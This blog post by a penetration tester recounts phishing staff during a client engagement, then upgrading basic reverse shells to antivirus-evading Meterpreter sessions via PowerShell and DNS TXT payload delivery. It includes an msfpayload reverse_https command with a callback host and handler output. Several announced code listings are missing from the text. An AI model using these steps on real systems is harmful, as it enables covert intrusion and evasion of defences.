Few months back and whilst in holidays, I got a call from the work that we just took an urgent project with a very short delivery time. The project was a penetration test for a company. All paperwork was done and the client was in a rush to get some results since holiday season was near.
No problem I said but actually there were a few. For starters I was in a different country, nowhere near the penetration lab of the company and my tools. As it’s accustomed also to start with zero knowledge about the clients’ systems, I wasn’t sure about their security, possible IDS systems, antivirus, system patches, firewalls and users’ experience.
There are many possible ideas here and ways to work, I choose to use metasploit and whatever tools look innocent enough not to rise suspicions. The common problem with metasploit is the payload delivery. Meterpreter is great but it’s detected from a very large amount of antiviruses if not properly modified. I used SET (http://www.social-engineer.org/) to deliver a simple payload, actually a very basic connect back shell, the first that I found in codeproject.com (http://www.codeproject.com/Articles/20250/Reverse-Connection-Shell).
Couple of hours later and after a few emails were send with ‘important’ information to the users of the company, metasploit’s multi handler was greeted with sessions. The sessions were mostly from windows 7 systems and a few old XP. The good news and the bad news, good news were the shells, bad news where … the shells. Used with meterpreter sessions and sessions from commercial tools the basic dos prompt seems poor. Time to upgrade the shell then in a fancy way then.
Powershell to the rescue !
Let’s first generate the meterpreter payload, reverse_https seems great,
root@host:~/trunk# ./msfpayload windows/meterpreter/reverse_https LHOST=178.32.xxx.xxx LPORT=8443 C | more
From all the payload we just need the first stage. The first stage is will provide the connect back to the metasploit server functionality that will fetch the second stage.
Here again, a couple of options, one way of delivering it can be the following, simply copy the first stage, convert it in a proper format for the powershell script and run the script.
Converting the shellcode to proper format needed by the powershell script:
converting the shellcode directly to our format:
and our powershell script:
set the metasploit server to handle requests for the payload:
And we have our poor initial shell, upgraded with cool meterpreter features, whilst our antivirus is still operational and not aware of the situation.
Method 2 do it in style.
Few weeks back I saw an excellent method from corelanc0d3r ( https://github.com/rapid7/metasploit-framework/pull/173 ) using TXT DNS records for payload delivery. This gave me an idea to create the same method with powershell, using raw C format also in the TXT records. With the same payload, stage 1 as above I created the following records:
and finally the powershell script to call the records:
Make sure the metasploit server is running with multi/handler and call the script from within powershell with: & .\Desktop\powershellcode1.ps1 .
Enjoy a 0 detection metasploit shell.
[*] Started HTTPS reverse handler on https://178.32.xxx.xxx:8443/
[*] Exploit running as background job.
[*] Starting the payload handler...
[*] 94.68.xxx.xxx:27789 Request received for /Zbi7...
[*] 94.68.xxx.xxx:27789 Staging connection for target /Zbi7 received...
[*] Patched transport at offset 486516...
[*] Patched URL at offset 486248...
[*] Patched Expiration Timeout at offset 641856...
[*] Patched Communication Timeout at offset 641860...
[*] Meterpreter session 4 opened (178.32.xxx.xxx:8443 -> 94.68.xxx.xxx:27789) at Wed Apr 11 13:16:17 +0300 2012
msf exploit(handler) >